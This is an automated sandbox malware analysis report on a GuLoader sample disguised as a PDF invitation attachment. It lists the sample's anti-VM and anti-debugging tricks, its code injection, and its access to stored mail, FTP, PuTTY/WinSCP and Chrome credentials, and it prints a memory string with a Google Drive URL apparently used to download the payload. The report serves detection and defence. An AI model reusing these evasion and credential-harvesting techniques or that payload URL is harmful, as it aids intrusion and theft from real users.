Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WOW1V-FWJJB6G5MIGMHVWOYYWXRCNCHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6136	Thread sleep count: 527 > 30			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6988	Thread sleep time: -60000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Code function: 0_2_020ACEC8 rdtsc

0_2_020ACEC8

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Window / User API: threadDelayed 527

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

System information queried: ModuleInformation

Jump to behavior

Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW'
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339978372.0000000002BDA000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419451133.000000000246A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Thread information set: HideFromDebugger			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Code function: 0_2_020ACEC8 rdtsc

0_2_020ACEC8

Enables debug privileges

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADAD0 mov eax, dword ptr fs:[00000030h]	0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AC6DF mov eax, dword ptr fs:[00000030h]	0_2_020AC6DF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ABA35 mov eax, dword ptr fs:[00000030h]	0_2_020ABA35
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADB37 mov eax, dword ptr fs:[00000030h]	0_2_020ADB37
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8EE2 mov eax, dword ptr fs:[00000030h]	0_2_020A8EE2

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Code function: 0_2_020AA1B2 LdrInitializeThunk,

0_2_020AA1B2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

ID:	531208
Product:	CloudBasic
Start time:	15:32:13
Start date:	30.11.2021
Sample:	Anexo I e II do convite#U00b7pdf.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	e779a8be256d298c6d96884724d7792b
SHA1:	5ff1cb154e5001791e3dd019721462fe20bfec80
SHA256:	9dbfeb5b6cdf7f40899f2f36ecd59d8c1f72ec680248e4b42f69496c61b5d19c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a	data	89CA7E02D8B79ED50986F098D5686EC9	A602E0D4398F00C827BFCF711066E67718CA1377	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794

Windows Analysis Report Anexo I e II do convite#U00b7pdf.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs